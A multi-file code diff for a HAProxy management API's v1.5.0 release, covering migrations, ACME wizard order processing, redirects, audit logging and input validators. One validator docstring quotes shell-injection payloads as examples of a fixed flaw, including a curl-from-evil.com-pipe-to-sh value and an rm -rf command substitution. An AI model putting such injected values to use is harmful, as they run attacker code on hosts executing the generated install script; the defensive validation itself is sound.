"""
CREATE INDEX IF NOT EXISTS idx_user_activity_logs_user_action_time
ON user_activity_logs (user_id, action, created_at DESC)
"""
)
logger.info("Ensured user_activity_logs (user_id, action, created_at) composite index")
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(
f"Error in ensure_user_activity_logs_user_action_time_index: {e}"
)
async def ensure_frontends_bind_unique_constraint():
"""v1.5.0 (R18c round 3 #1 — KRITIK concurrency): partial unique
constraint on (cluster_id, bind_address, bind_port) WHERE
is_active.
Pre-fix: `services/frontend_service.check_bind_port_collision`
ran a plain `SELECT` outside the wizard transaction with no
`FOR UPDATE`, and the schema had NO uniqueness on
(cluster_id, bind_address, bind_port). Two concurrent wizards
targeting the same cluster + bind could both pass the check
and both INSERT, producing TWO active frontends bound to the
same port — HAProxy then refused to reload (port already in
use) and the cluster was wedged until manual cleanup.
Adding a partial UNIQUE INDEX serializes the race at the
database level: the second INSERT raises UniqueViolationError,
which the wizard router (R18b round 3 #11) already maps to a
clean 409.
NOT auto-deduplicating: `CREATE UNIQUE INDEX IF NOT EXISTS`
only skips when the index NAME already exists. If a deployment
already has duplicate active rows (a pre-fix race that landed),
the migration FAILS with "could not create unique index" and is
logged as non-fatal — runtime continues without the index, which
means the database-level race protection is OFF until an operator
manually consolidates the conflicting rows. Operationally:
# find conflicting active rows
SELECT cluster_id, bind_address, bind_port, COUNT(*)
FROM frontends
WHERE is_active = TRUE
GROUP BY 1,2,3 HAVING COUNT(*) > 1;
Even without the index, the wizard router still maps the
happy-path race outcome to 409 via UniqueViolationError when
the index DOES exist, so this migration is the belt-and-
suspenders layer rather than the only protection.
Partial WHERE is_active is intentional — soft-deleted
frontends (is_active=false) are kept for audit and would
otherwise prevent re-creating a binding after deactivation.
"""
conn = None
try:
conn = await get_database_connection()
# Use a unique INDEX (not constraint) because PostgreSQL
# only allows partial uniqueness via an INDEX, not a table
# CONSTRAINT. Functionally equivalent for asyncpg's
# UniqueViolationError path.
await conn.execute(
"""
CREATE UNIQUE INDEX IF NOT EXISTS
idx_frontends_active_bind_unique
ON frontends (cluster_id, bind_address, bind_port)
WHERE is_active = TRUE
"""
)
logger.info(
"Ensured frontends partial UNIQUE on "
"(cluster_id, bind_address, bind_port) WHERE is_active=TRUE"
)
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
# Existing duplicates would surface here as
# 'could not create unique index'. Log loudly so operators
# see the conflicting rows in their migration logs but do
# NOT abort startup — the wizard 409-mapping path already
# covers the steady-state race; the constraint is the
# belt-and-suspenders.
logger.error(
f"Error in ensure_frontends_bind_unique_constraint: {e} "
"(non-fatal — wizard router still maps UniqueViolation "
"to 409 even without the index)"
)
+325 -3
View File
@@ -8,7 +8,7 @@ import redis
import asyncio
from datetime import datetime, timedelta
_version_info = {"version": "1.4.0", "releaseName": "ACME Stability & Enterprise Audit", "releaseDate": "2026-05-06"}
_version_info = {"version": "1.5.0", "releaseName": "ACME Diagnostics & Site Wizard", "releaseDate": "2026-05-08"}
for _vpath in ["/app/version.json", os.path.join(os.path.dirname(__file__), "..", "version.json")]:
try:
with open(_vpath) as _vf:
@@ -38,6 +38,8 @@ from routers.maintenance import router as maintenance_router
from routers.dashboard_stats import router as dashboard_stats_router
from routers.settings import router as settings_router
from routers.letsencrypt import router as letsencrypt_router
from routers.acme_diagnostics import router as acme_diagnostics_router
from routers.site_wizard import router as site_wizard_router
# Production logging configuration
from utils.logging_config import setup_production_logging
@@ -278,6 +280,14 @@ async def complete_pending_acme_orders():
await asyncio.sleep(60)
continue
# v1.5.0 (M30): daily-watermarked TTL prune for acme_order_events
# (90d) and wizard_drafts (30d). Best-effort, never raises.
try:
from utils.activity_log import prune_acme_events_and_drafts_if_due
await prune_acme_events_and_drafts_if_due()
except Exception as prune_err:
logger.debug(f"v1.5.0 daily prune skipped: {prune_err}")
from routers.letsencrypt import _complete_certificate
from services.acme_service import acme_service as acme_svc
@@ -309,10 +319,21 @@ async def complete_pending_acme_orders():
finally:
await close_database_connection(conn_claim)
# v1.5.0 (Bulgu #2 fix): wizard_staged orders MUST be processed
# even when no pending/processing orders exist — otherwise a freshly
# created wizard order (no concurrent ACME activity) would never
# leave wizard_staged status and never reach the LE API call.
# Run the wizard pipeline FIRST so the early-continue below cannot
# starve it.
try:
await _process_wizard_staged_orders(acme_svc)
except Exception as ws_err:
logger.error(f"[ACME-WIZARD] Wizard-staged processing failed: {ws_err}")
if not claimed_ids:
await asyncio.sleep(60)
continue
logger.info(f"[ACME-COMPLETE] Claimed {len(claimed_ids)} order(s) for completion: {claimed_ids}")
for oid in claimed_ids:
@@ -335,11 +356,240 @@ async def complete_pending_acme_orders():
except Exception as poll_err:
logger.error(f"[ACME-COMPLETE] Failed to complete order {oid}: {poll_err}")
# NOTE: v1.5.0 wizard-staged processing now runs BEFORE the
# claimed_ids early-continue above (Bulgu #2 fix), so it executes
# every cycle regardless of pending/processing volume.
except Exception as e:
logger.error(f"[ACME-COMPLETE] Error in completion task: {e}")
await asyncio.sleep(60)
async def _process_wizard_staged_orders(acme_svc):
"""v1.5.0 Feature B (Issue #14): drive wizard_staged ACME orders forward.
Round 11 fix: NO `created_at > NOW() - INTERVAL` filter — that would prevent
older staged orders from ever reaching the in-loop 24h timeout check. We
instead enforce the 24h timeout explicitly via wizard_staged_until.
"""
from utils.activity_log import record_event
from services.letsencrypt_service import (
create_order_via_api,
promote_staged_order_to_pending,
)
conn = await get_database_connection()
try:
async with conn.transaction():
rows = await conn.fetch(
"""
SELECT id, account_id, domains, cluster_ids,
pending_apply_version_name, wizard_staged_until, order_url
FROM letsencrypt_orders
WHERE status = 'wizard_staged'
AND (updated_at IS NULL OR updated_at < NOW() - INTERVAL '30 seconds')
ORDER BY created_at
LIMIT 50
FOR UPDATE SKIP LOCKED
"""
)
if not rows:
return
await conn.execute(
"UPDATE letsencrypt_orders SET updated_at = NOW() WHERE id = ANY($1::int[])",
[r["id"] for r in rows],
)
finally:
await close_database_connection(conn)
for row in rows:
order_id = row["id"]
account_id = row["account_id"]
version_name = row["pending_apply_version_name"]
# Parse JSONB payloads defensively (asyncpg may return list or str)
try:
domains = (
row["domains"] if isinstance(row["domains"], list)
else __import__("json").loads(row["domains"] or "[]")
)
except Exception:
domains = []
try:
cluster_ids = (
row["cluster_ids"] if isinstance(row["cluster_ids"], list)
else __import__("json").loads(row["cluster_ids"] or "[]")
)
except Exception:
cluster_ids = []
try:
# 1) 24h timeout abandonment (M25)
if row["wizard_staged_until"] is not None:
# PostgreSQL returns timezone-aware datetime; compare via NOW() in SQL
conn = await get_database_connection()
try:
expired = await conn.fetchval(
"SELECT $1 < NOW()", row["wizard_staged_until"]
)
if expired:
await conn.execute(
"""
UPDATE letsencrypt_orders
SET status='invalid',
error_detail = 'wizard staged timeout (>24h with no agent confirm)',
updated_at = NOW()
WHERE id = $1
""",
order_id,
)
await record_event(
order_id,
"wizard_staged_timeout",
severity="ERROR",
message="Wizard-staged ACME order abandoned after 24h",
conn=conn,
)
logger.warning(
f"[ACME-WIZARD] Order {order_id} abandoned (wizard_staged_until elapsed)"
)
continue
finally:
await close_database_connection(conn)
# 2) Agent-confirm gating: at least one agent in any of the
# target clusters must have applied_config_version equal to the
# gating version name. Skip+retry next cycle if not yet.
if not version_name or not cluster_ids:
logger.debug(
f"[ACME-WIZARD] Order {order_id} missing version_name/cluster_ids, skipping"
)
continue
conn = await get_database_connection()
try:
confirmed_count = await conn.fetchval(
"""
SELECT COUNT(*)
FROM agents a
JOIN haproxy_clusters hc ON hc.pool_id = a.pool_id
WHERE hc.id = ANY($1::int[])
AND a.applied_config_version = $2
""",
cluster_ids,
version_name,
)
finally:
await close_database_connection(conn)
if not confirmed_count:
logger.info(
f"[ACME-WIZARD] Order {order_id} waiting on agent confirm (version={version_name})"
)
continue
# 3) R58/M37 idempotency: if order_url is already set we somehow
# succeeded the LE call but failed status update — re-try
# completion later via the normal pending/processing pipeline.
if row["order_url"]:
conn = await get_database_connection()
try:
await conn.execute(
"UPDATE letsencrypt_orders SET status='pending', updated_at=NOW() WHERE id=$1",
order_id,
)
finally:
await close_database_connection(conn)
continue
# 4) Promote: call the LE API for real
try:
api_result = await create_order_via_api(
acme_svc,
account_id=account_id,
domains=domains,
cluster_ids=cluster_ids,
)
except Exception as api_err:
# Failure -> stay wizard_staged, will retry next pass
logger.warning(
f"[ACME-WIZARD] Order {order_id} LE API call failed (will retry): {api_err}"
)
conn = await get_database_connection()
try:
await record_event(
order_id,
"wizard_le_api_retry",
severity="WARN",
message=str(api_err)[:500],
conn=conn,
)
finally:
await close_database_connection(conn)
continue
# The thin wrapper currently delegates to AcmeService.create_order
# which INSERTs a NEW row. We translate that into an UPDATE of the
# staged row by copying the new row's order_url + finalize_url
# then deleting the duplicate.
new_order_id = api_result.get("id")
order_url = api_result.get("order_url")
conn = await get_database_connection()
try:
async with conn.transaction():
if new_order_id and new_order_id != order_id:
new_row = await conn.fetchrow(
"""
SELECT order_url, finalize_url, status, expires_at
FROM letsencrypt_orders WHERE id = $1
""",
new_order_id,
)
if new_row:
await promote_staged_order_to_pending(
conn,
order_id=order_id,
order_url=new_row["order_url"] or "",
finalize_url=new_row["finalize_url"] or "",
status=new_row["status"] or "pending",
expires_at=new_row["expires_at"],
)
# Move challenges from the duplicate to the staged row
await conn.execute(
"UPDATE acme_challenges SET order_id = $1 WHERE order_id = $2",
order_id,
new_order_id,
)
await conn.execute(
"DELETE FROM letsencrypt_orders WHERE id = $1",
new_order_id,
)
elif order_url:
await promote_staged_order_to_pending(
conn,
order_id=order_id,
order_url=order_url,
finalize_url=api_result.get("finalize_url") or "",
status="pending",
expires_at=None,
)
await record_event(
order_id,
"wizard_promoted",
severity="INFO",
message=f"Wizard-staged order promoted to pending after agent confirm",
details={"version_name": version_name},
conn=conn,
)
logger.info(
f"[ACME-WIZARD] Order {order_id} promoted to pending (LE order created)"
)
finally:
await close_database_connection(conn)
except Exception as outer:
logger.error(f"[ACME-WIZARD] Order {order_id} processing error: {outer}")
async def check_letsencrypt_renewals():
"""
Background task to auto-renew expiring ACME certificates.
@@ -582,6 +832,45 @@ app.include_router(security_router)
app.include_router(configuration_router)
app.include_router(settings_router)
app.include_router(letsencrypt_router)
app.include_router(acme_diagnostics_router) # v1.5.0 Issue #13: ACME Diagnostic Panel
app.include_router(site_wizard_router) # v1.5.0 Issue #14: New Site Setup Wizard
# Legacy URL alias: /api/proxied-hosts/* → 308 redirect to /api/sites/*.
# The Site Wizard endpoints were renamed from `/api/proxied-hosts/...`
# to `/api/sites/...` in this release. The 308 (Permanent Redirect)
# preserves the original method + body — POST/PUT/DELETE all continue
# to work — so any external integrator still pointing at the old slug
# keeps working through the redirect during the transition window.
# `include_in_schema=False` keeps the legacy paths out of OpenAPI so
# new consumers only see the canonical `/api/sites/*` URLs.
from fastapi import Request as _LegacyAliasRequest
from fastapi.responses import RedirectResponse as _LegacyAliasRedirect
@app.api_route(
"/api/proxied-hosts",
methods=["GET", "POST", "PUT", "DELETE", "PATCH"],
include_in_schema=False,
name="legacy_proxied_hosts_root_alias",
)
async def _legacy_proxied_hosts_root_alias(request: _LegacyAliasRequest):
qs = request.url.query
target = "/api/sites" + (("?" + qs) if qs else "")
return _LegacyAliasRedirect(url=target, status_code=308)
@app.api_route(
"/api/proxied-hosts/{rest:path}",
methods=["GET", "POST", "PUT", "DELETE", "PATCH"],
include_in_schema=False,
name="legacy_proxied_hosts_subpath_alias",
)
async def _legacy_proxied_hosts_subpath_alias(rest: str, request: _LegacyAliasRequest):
qs = request.url.query
target = f"/api/sites/{rest}" + (("?" + qs) if qs else "")
return _LegacyAliasRedirect(url=target, status_code=308)
@app.on_event("startup")
async def startup_event():
@@ -702,7 +991,40 @@ async def startup_event():
async def shutdown_event():
"""Cleanup on shutdown"""
logger.info("HAProxy OpenManager API shutting down...")
# R18c audit fix (round 3 #5): drain pending fire-and-forget
# background tasks BEFORE closing the DB pool. The audit
# logger middleware (`activity_logger.py`) and the wizard
# router (`site_wizard.py`, R18b round 7) both use
# `asyncio.create_task(...)` to write `user_activity_logs`
# rows without blocking the response. Pre-fix the shutdown
# event closed the DB pool immediately, so any in-flight
# background task that was about to fetchval/execute hit
# "pool is closed" and the audit row was lost — the operator
# later opened the activity table and could not see why the
# cluster's last action happened. Wait up to 5 seconds for
# pending tasks scheduled on this loop to finish before
# tearing the pool down. Bounded so a stuck task can't block
# graceful shutdown indefinitely.
try:
loop = asyncio.get_event_loop()
# All non-current tasks (FastAPI's request-handler tasks
# are already done by the time on_shutdown fires; what's
# left are the create_task background workers).
pending = [t for t in asyncio.all_tasks(loop) if t is not asyncio.current_task() and not t.done()]
if pending:
logger.info(f"Draining {len(pending)} pending background task(s) before pool close...")
await asyncio.wait(pending, timeout=5.0)
still_pending = [t for t in pending if not t.done()]
if still_pending:
logger.warning(
f"{len(still_pending)} background task(s) did not "
"complete within 5s — proceeding with pool close. "
"These rows may not be persisted."
)
except Exception as drain_err:
logger.warning(f"Background-task drain skipped: {drain_err}")
# Close database connection pool gracefully
try:
logger.info("Closing database connection pool...")
+67 -2
View File
@@ -38,6 +38,16 @@ RESOURCE_MAPPING = {
'/api/maintenance': 'maintenance',
# Audit Tur 4/5 / Commit 8: ACME endpoint coverage
'/api/letsencrypt': 'letsencrypt_order',
# v1.5.0 Feature B (Issue #14): site setup wizard
'/api/sites': 'site',
# Backward-compat alias for the legacy URL slug. The wizard router's
# primary mount is `/api/sites`; main.py also registers a hidden
# 308-redirect alias on `/api/proxied-hosts/*` so external
# integrators still pointing at the old slug keep working. The 308
# response is filtered out below (only 2xx is logged), so this map
# entry is here only for the rare in-flight pre-redirect call that
# somehow lands as a 2xx (edge case).
'/api/proxied-hosts': 'site',
}
# Special action mappings
@@ -58,11 +68,50 @@ SPECIAL_ACTIONS = {
'/api/letsencrypt/accounts/{account_id}/permanent': 'acme_account_purged',
'/api/letsencrypt/orders/{order_id}/retry': 'acme_order_retried',
'/api/letsencrypt/orders/{order_id}': 'acme_order_cancelled',
# v1.5.0 Feature A (Issue #13): ACME diagnostics
'/api/letsencrypt/orders/{order_id}/diagnostics': 'acme_diagnostics_run',
'/api/letsencrypt/orders/{order_id}/diagnostics/{check_id}/rerun': 'acme_diagnostic_check_rerun',
# v1.5.0 Feature B (Issue #14): site setup wizard.
# R18c audit fix (round 1 #9): the wizard CREATE endpoint
# (POST /api/sites) emits a richer `wizard_create_site` row
# with wizard_status / cluster_id / domains / ssl_mode /
# apply_error / acme_staging_error directly from the router
# (R18b round 6 #15). If we ALSO log `site_created` here,
# every successful wizard create produces TWO
# user_activity_logs rows for the same operator action and
# dashboards counting "creates" by verb double-count. Drop
# that entry so the wizard owns its own audit row, while the
# other paths (preview, preflight, draft) still log via the
# middleware.
'/api/sites/preview': 'site_previewed',
'/api/sites/preflight-acme': 'site_acme_preflight',
'/api/sites/drafts': 'site_draft_saved',
'/api/sites/drafts/{draft_id}': 'site_draft_deleted',
# Backward-compat aliases for the legacy URL slug — the 308
# redirect should consume these in practice, but if a 2xx ever
# leaks through directly the action map is still correct.
'/api/proxied-hosts/preview': 'site_previewed',
'/api/proxied-hosts/preflight-acme': 'site_acme_preflight',
'/api/proxied-hosts/drafts': 'site_draft_saved',
'/api/proxied-hosts/drafts/{draft_id}': 'site_draft_deleted',
}
def extract_resource_info(path: str, method: str) -> tuple[str, str, Optional[str]]:
"""Extract resource type, action, and resource ID from request path and method"""
# R18c audit fix (round 1 #9): the wizard CREATE endpoint
# (POST /api/sites, exact path) emits its OWN richer audit
# row from the router (`wizard_create_site`). Skip middleware
# logging for that single endpoint so we don't produce
# duplicate user_activity_logs rows per successful wizard
# create. Subpaths (`/preview`, `/preflight-acme`, `/drafts`,
# `/drafts/{id}`) still log via SPECIAL_ACTIONS below. The
# legacy `/api/proxied-hosts` slug is also covered for
# parity (the 308 redirect typically intercepts it before
# this point, but safety net).
if path in ('/api/sites', '/api/proxied-hosts') and method == 'POST':
return 'unknown', method.lower(), None
# Check for special actions first
for pattern, action in SPECIAL_ACTIONS.items():
if matches_pattern(path, pattern):
@@ -100,6 +149,12 @@ def matches_pattern(path: str, pattern: str) -> bool:
def extract_resource_type_from_path(path: str) -> str:
"""Extract resource type from path"""
# Bulgu #40: include v1.5.0 wizard path so audit rows aren't logged with
# resource_type='unknown'. Order matters — '/sites' / '/proxied-hosts'
# must be checked BEFORE generic '/frontends'/'/backends' fallbacks.
# Legacy `/proxied-hosts` slug is preserved for backward compat.
if '/sites' in path or '/proxied-hosts' in path:
return 'site'
if '/letsencrypt' in path:
return 'letsencrypt_order'
elif '/frontends' in path:
@@ -145,7 +200,17 @@ async def log_activity_middleware(request: Request, call_next):
if request.method == 'GET' or request.url.path in ['/health', '/api/health', '/']:
response = await call_next(request)
return response
# R18c audit fix (round 1 #9): the wizard CREATE endpoint owns
# its own audit row; skip the middleware path for that exact
# endpoint+method to prevent duplicate user_activity_logs rows.
# See router site_wizard.py for the explicit log_user_activity
# call with action='wizard_create_site'. The legacy
# `/api/proxied-hosts` slug is also short-circuited so a 308
# redirect doesn't double-log.
if request.url.path in ('/api/sites', '/api/proxied-hosts') and request.method == 'POST':
return await call_next(request)
# Get user from token
user = None
try:
+96 -2
View File
@@ -1,4 +1,5 @@
from pydantic import BaseModel
import re
from pydantic import BaseModel, validator
from typing import Optional, List, Dict, Any
class AgentCreate(BaseModel):
@@ -106,15 +107,108 @@ PoolCreate = AgentPoolCreate
PoolUpdate = AgentPoolUpdate
class AgentScriptRequest(BaseModel):
"""Request body for agent install / upgrade script generation.
Bulgu #81 (round-22 audit) — pre-fix this model had ZERO
validators. Every field was a free-form `str`, and the
generator at `routers/agent.py::generate_install_script`
interpolates the values directly into a shell-script
template via `script_template.replace("{{KEY}}", value)`.
An operator with `agents.create` permission could therefore
supply payloads like:
haproxy_bin_path = "/usr/sbin/haproxy; curl evil.com/x.sh | sh #"
agent_name = "$(rm -rf /var/log/haproxy-agent)"
hostname_prefix = "`reboot`"
The generated `install-agent.sh` would then carry the
payload verbatim. Anyone running the script (typically as
root via `sudo ./install-agent.sh`) would execute the
injected commands. Because the script is downloaded as a
file and frequently shared between teammates, the audit
trail loses the connection between the operator who
generated it and the host that eventually ran it.
The validators below mirror the existing field-validation
conventions in `models/frontend.py` / `models/backend.py`:
* `platform`, `architecture`: tightly enumerated.
* `agent_name`, `hostname_prefix`: alphanumerics + the
dash / underscore / dot set that hostnames legally use.
* The three `*_path` fields: absolute POSIX paths
without shell metacharacters or path-traversal segments.
HAProxy's own files always live under operator-controlled
paths; the regex is generous enough for any real OS-package
install location while strict enough that the result is
safe to inline into a shell script.
"""
platform: str
architecture: str
pool_id: int
cluster_id: int # ✅ FIXED: Added cluster_id field
cluster_id: int
agent_name: str
hostname_prefix: str
haproxy_bin_path: str
haproxy_config_path: str
stats_socket_path: str
@validator('platform', 'architecture')
def _validate_platform_token(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('platform/architecture must be a non-empty string')
s = v.strip()
if len(s) > 64:
raise ValueError('platform/architecture too long (max 64 chars)')
if not re.match(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$', s):
raise ValueError(
'platform/architecture must contain only letters, '
'digits, and `._-`'
)
return s
@validator('agent_name', 'hostname_prefix')
def _validate_hostname_token(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('agent_name/hostname_prefix must be a non-empty string')
s = v.strip()
if len(s) > 64:
raise ValueError('agent_name/hostname_prefix too long (max 64 chars)')
# RFC 1123 hostname-label-ish: letters, digits, dash,
# underscore, dot. NO shell metacharacters, no spaces,
# no `$` `` ` `` `;` `&` `|` `<` `>` `\` `"` `'` `(` `)` etc.
if not re.match(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$', s):
raise ValueError(
'agent_name/hostname_prefix must start with an '
'alphanumeric and contain only letters, digits, dots, '
'dashes or underscores'
)
return s
@validator('haproxy_bin_path', 'haproxy_config_path', 'stats_socket_path')
def _validate_safe_posix_path(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('path must be a non-empty string')
s = v.strip()
if len(s) > 4096:
raise ValueError('path too long (max 4096 chars)')
if not s.startswith('/'):
raise ValueError('path must be an absolute POSIX path starting with `/`')
# Reject ANY shell-metacharacter that could break out of
# the surrounding shell context in the generated script,
# plus newline / NULL / backslash / glob wildcards. Path-
# traversal sequences are not strictly dangerous (the
# agent file system owner decides what's accessible) but
# `..` segments are rejected anyway to keep the audit log
# readable.
FORBIDDEN = set('$`;&|<>"\'\\\n\r\x00*?')
if any(c in FORBIDDEN for c in s):
raise ValueError(
'path contains a forbidden character — shell '
'metacharacters and whitespace are not allowed '
'to keep the generated install script safe to execute'
)
if '/../' in s or s.endswith('/..') or s.startswith('../'):
raise ValueError('path must not contain `..` segments')
return s
class AgentUpgradeRequest(BaseModel):
agent_id: int
+102 -6
View File
@@ -1,5 +1,5 @@
from pydantic import BaseModel, validator
from typing import Optional, List
from typing import Literal, Optional, List
class ServerConfig(BaseModel):
server_name: str
@@ -11,7 +11,15 @@ class ServerConfig(BaseModel):
check_port: Optional[int] = None
backup_server: bool = False
ssl_enabled: bool = False
ssl_verify: Optional[str] = None
# PR-2 (R11.B): tighten to strict Literal aligned with HAProxy's
# `server ... ssl verify <none|required>` semantics. Backend-side
# `verify optional` is NOT supported by HAProxy (only frontend
# bind-side accepts it) — pre-PR-2 the field accepted arbitrary
# strings (`'optional'`, `'true'`, etc.) and the generator
# rendered them verbatim, producing parser errors. Empty strings
# from the React form are coerced to None by
# `coerce_ssl_verify_empty_to_none` below.
ssl_verify: Optional[Literal["none", "required"]] = None
ssl_certificate_id: Optional[int] = None # SSL certificate for backend server
# SSL Advanced Options (server SSL parameters)
@@ -34,11 +42,56 @@ class ServerConfig(BaseModel):
raise ValueError(f'Invalid TLS version: {v}. Must be one of: {", ".join(valid_versions)}')
return v
@validator('ssl_verify', pre=True)
def coerce_ssl_verify_empty_to_none(cls, v):
"""PR-2 (R11.B): React form Select widgets clear to '' (empty
string) but the strict Literal would reject that. Coerce the
empty string and the legacy sentinels written by older
clients into None. Note: server-side mTLS only accepts
``none`` or ``required`` (HAProxy's `server ... verify`
keyword has no `optional` mode); a legacy `'optional'`
value is also coerced to None to fail-safe rather than
rendering an invalid directive.
"""
if v is None:
return None
if isinstance(v, str):
stripped = v.strip().lower()
if stripped in ("", "[]", "{}", "null"):
return None
if stripped == "none":
return "none"
if stripped == "required":
return "required"
if stripped == "optional":
# Server-side `verify optional` is invalid HAProxy.
# Coerce to None so the generator simply omits the
# directive instead of producing a parser-fatal line.
return None
return v
class BackendConfig(BaseModel):
name: str
cluster_id: int
balance_method: str = 'roundrobin'
mode: str = 'http'
@validator('name')
def reject_system_prefix(cls, v):
# R18 audit fix (round 3 #5): manual backend create previously
# accepted leading-underscore names (e.g. `_my_backend`). The
# agent's `_should_sync_backend` filter then dropped any such
# row from the agent->backend reverse-sync, producing silent
# control-plane drift between DB and on-disk haproxy.cfg. The
# wizard's BackendStep already rejected this; align the manual
# path so the constraint is uniform across entry points.
if isinstance(v, str) and v.startswith('_'):
raise ValueError(
"Backend name must not start with '_' (reserved for "
"system-managed entities such as the ACME challenge "
"backend)."
)
return v
health_check_uri: Optional[str] = None
health_check_interval: Optional[int] = 2000
health_check_expected_status: Optional[int] = 200
@@ -56,12 +109,34 @@ class BackendConfig(BaseModel):
options: Optional[str] = None
servers: List[ServerConfig] = []
@validator('health_check_interval', 'timeout_connect', 'timeout_server', 'timeout_queue', 'fullconn')
# Bulgu #68 (round-22 audit) — wizard's BackendStep declares
# `fullconn: Optional[int] = Field(default=None, ge=0, ...)`
# (0 == HAProxy "fullconn disabled" sentinel). The manual
# BackendConfig pre-fix used a single `check_positive` that
# rejected `<= 0` for ALL of `health_check_interval`,
# `timeout_connect`, `timeout_server`, `timeout_queue`, AND
# `fullconn` — so a wizard-created backend with
# `fullconn=0` (or one persisted before fullconn was
# introduced and now defaults to 0) would 422 on every PUT,
# even when the operator was only changing the balance
# method or adding a server. Same Bulgu #62 "wizard
# accepted / manual rejects" lockout pattern.
#
# Split into two validators: the four timeout/interval fields
# keep `> 0` (HAProxy parser hard requirement), while
# `fullconn` switches to `>= 0` mirroring the wizard.
@validator('health_check_interval', 'timeout_connect', 'timeout_server', 'timeout_queue')
def check_positive(cls, v):
if v is not None and v <= 0:
raise ValueError('Timeout, interval, and connection values must be positive')
return v
@validator('fullconn')
def check_fullconn_non_negative(cls, v):
if v is not None and v < 0:
raise ValueError('fullconn must be >= 0 (0 disables the directive)')
return v
@validator('health_check_expected_status')
def check_http_status(cls, v):
if v is not None and (v < 100 or v > 599):
@@ -72,6 +147,18 @@ class BackendConfigUpdate(BaseModel):
name: Optional[str] = None
balance_method: Optional[str] = None
mode: Optional[str] = None
@validator('name')
def reject_system_prefix_update(cls, v):
# R18 audit fix (round 3 #5): rename guard. Without it an
# operator could `PUT` a backend's name to `_anything`, which
# would then be filtered out by the agent reverse-sync.
if v is not None and isinstance(v, str) and v.startswith('_'):
raise ValueError(
"Backend name must not start with '_' (reserved for "
"system-managed entities)."
)
return v
health_check_uri: Optional[str] = None
health_check_interval: Optional[int] = None
health_check_expected_status: Optional[int] = None
@@ -89,12 +176,21 @@ class BackendConfigUpdate(BaseModel):
options: Optional[str] = None
servers: Optional[List[ServerConfig]] = None
@validator('health_check_interval', 'timeout_connect', 'timeout_server', 'timeout_queue', 'fullconn')
# Bulgu #68 (round-22 audit) — same alignment as BackendConfig
# above. Update path is where the wizard-created `fullconn=0`
# row most often blows up.
@validator('health_check_interval', 'timeout_connect', 'timeout_server', 'timeout_queue')
def check_positive_update(cls, v):
if v is not None and v <= 0:
raise ValueError('Timeout, interval, and connection values must be positive')
return v
@validator('fullconn')
def check_fullconn_non_negative_update(cls, v):
if v is not None and v < 0:
raise ValueError('fullconn must be >= 0 (0 disables the directive)')
return v
@validator('health_check_expected_status')
def check_http_status_update(cls, v):
if v is not None and (v < 100 or v > 599):
+312 -57
View File
@@ -1,10 +1,42 @@
from pydantic import BaseModel, validator, ValidationError
from typing import List, Optional, Any
from typing import List, Literal, Optional, Any
import re
import ipaddress
import os
import json
# Phase K Phase D follow-up (Bulgu #13) — shared helper that detects
# whether a HAProxy `use_backend` / `redirect` rule's condition
# references the same ACL in both positive AND negated form (e.g.
# `if acl1 !acl1`). HAProxy accepts the syntax but the predicate
# `X AND NOT X` is always false, so the rule never fires and traffic
# silently falls through to `default_backend`. Mirrors the same
# helper in `models/site_wizard.py::_detect_acl_contradiction` so
# the manual Frontend API and the wizard offer identical guarantees.
_FRONTEND_ACL_NAME_TOKEN = re.compile(r"^!?([A-Za-z_][\w.-]*)$")
def _frontend_has_acl_contradiction(directive: str) -> bool:
"""Return True if `directive` (a full use_backend / redirect
rule string) contains both `X` and `!X` token for the same ACL
name."""
pos: set = set()
neg: set = set()
for raw in directive.split():
if raw in ('if', 'unless'):
continue
m = _FRONTEND_ACL_NAME_TOKEN.match(raw)
if not m:
continue
name = m.group(1)
if raw.startswith('!'):
neg.add(name)
else:
pos.add(name)
return bool(pos & neg)
class FrontendConfig(BaseModel):
name: str
bind_address: str = "*"
@@ -17,7 +49,26 @@ class FrontendConfig(BaseModel):
ssl_port: Optional[int] = None # DEPRECATED: SSL uses bind_port now (backward compatibility)
ssl_cert_path: Optional[str] = None
ssl_cert: Optional[str] = None
ssl_verify: Optional[str] = "optional"
# R18b audit fix: default to None (not "optional") so an OMITTED
# field on PUT/POST means "don't add a verify directive" rather
# than silently switching the bind to `verify optional`. The pre-
# R18b default broke round-trips: an operator could clear the
# ssl_verify Select in FrontendManagement, the cleared value got
# dropped from the JSON payload, and Pydantic re-applied
# "optional" — exactly the behaviour the cleared selection was
# meant to undo. The HAProxy config generator already treats
# NULL/empty as "omit", so None is the correct default.
#
# PR-2 (R11.B): tighten the type to a strict Literal aligned with
# what the HAProxy config generator can actually emit. Pre-PR-2
# `Optional[str]` accepted any value (e.g. legacy `'true'`,
# `'false'`, `'1'`) which the generator then attempted to render
# verbatim as `bind ... ssl ... verify true` — a HAProxy fatal
# parser error. The Literal also unifies the contract with the
# wizard's `SSLChoice.ssl_verify` so manual + wizard create paths
# accept the same set. Empty strings from the React form are
# coerced to None by `_coerce_ssl_verify_empty_to_none` below.
ssl_verify: Optional[Literal["none", "optional", "required"]] = None
# SSL Advanced Options (bind SSL parameters)
ssl_alpn: Optional[str] = None # Application-Layer Protocol Negotiation (e.g., "h2,http/1.1")
@@ -106,14 +157,26 @@ class FrontendConfig(BaseModel):
def validate_name(cls, v):
if not v or not v.strip():
raise ValueError('Frontend name cannot be empty')
# HAProxy names cannot contain spaces or special characters
if not re.match(r'^[a-zA-Z0-9_.-]+$', v.strip()):
raise ValueError('Frontend name can only contain letters, numbers, dot (.), underscore (_) and dash (-). Spaces and special characters are not allowed.')
if len(v.strip()) > 50:
raise ValueError('Frontend name cannot exceed 50 characters')
# Bulgu #69 (round-22 audit) — align the manual frontend-name
# length cap with the wizard's `_FRONTEND_NAME_REGEX`, which
# allows up to 64 characters
# (`^[a-zA-Z][a-zA-Z0-9_-]{0,63}$`). Pre-fix the manual model
# capped at 50, so a wizard-created frontend with a 51-64
# character name (legal at CREATE) would 422 on the very
# first manual PUT — the same Bulgu #62 "wizard accepted /
# manual rejects" lockout pattern. HAProxy itself imposes
# no fixed identifier length cap; 64 is a defensive ceiling
# that mirrors typical operating-system PATH_MAX components
# while staying generous for prefixed names like
# `tenant-acme-app-frontend-https`.
if len(v.strip()) > 64:
raise ValueError('Frontend name cannot exceed 64 characters')
return v.strip()
@validator('bind_address')
